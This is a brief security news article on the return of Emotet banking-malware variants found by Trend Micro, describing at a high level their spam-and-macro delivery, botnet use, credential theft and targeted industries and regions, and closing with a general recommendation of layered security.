EMOTET banking malware returns with a wider scope & vengeance

The EMOTET banking malware has emerged with a wider target scope than ever before, three years after it was originally found.

The original malware primarily targeted the banking sector and monitored network activity in order to steal information. It was distributed through spam messages disguised as invoices and bank transfers.

Trend Micro researchers discovered the new Emotet variants in August. The variants were detected as TSPY_EMOTET.AUSJLA, TSPY_EMOTET.SMD3, TSPY_EMOTET.AUSJKW and TSPY_EMOTET.AUSJKV.

Researchers believe that the new variants have been created to target new geographic regions and new business sectors, although its functions as an information stealer remain the same.

Smart Protection Network data showed that the malware is targeting a number of industries, including healthcare and hospitality. Most of the malware is targeting the US, however the UK and ‘other’ countries made up 12% of targets respectively.

Because the malware has been dormant for so long, researchers believe that the new wave of attacks are attempting to catch targets off guard, thus increasing affect effectiveness.

“For a malware with email-spamming and lateral-movement capabilities, infecting business systems and acquiring corporate e-mails translates to larger and more effective spam targeting and a higher chance of gaining information. For a malware with email-spamming and lateral-movement capabilities, infecting business systems and acquiring corporate e-mails translates to larger and more effective spam targeting and a higher chance of gaining information,” Trend Micro researchers say.

The new variants are also using botnets to deliver spam. Like the original Emotet, the variants mimic an invoice or payment notification in order to trick users into clicking a malicious URL. That URL downloads a document with a malicious macro, which is launched when clicked.

The macro runs PowerShell commands that distribute the malware into the system. It will establish itself as a system service and ensure it runs at startup every time, researchers say.

It can then make the infected system part of its botnet, deliver payloads such as Dridex, steal usernames and passwords and harvest email information.

The Emotet malware can also spread through network propagation and compromised URLs for command & control purposes.

“The malware can also turn the infected system into part of a botnet that sends spam emails intended to spread the malware even further. This allows the trojan to spread quickly, as the more systems it can potentially infect, the faster it will propagate. The malware is also capable of harvesting email information and stealing username and password information found in installed browsers,” researchers conclude.

Multilayered security is recommended for protection against threats such as Emotet.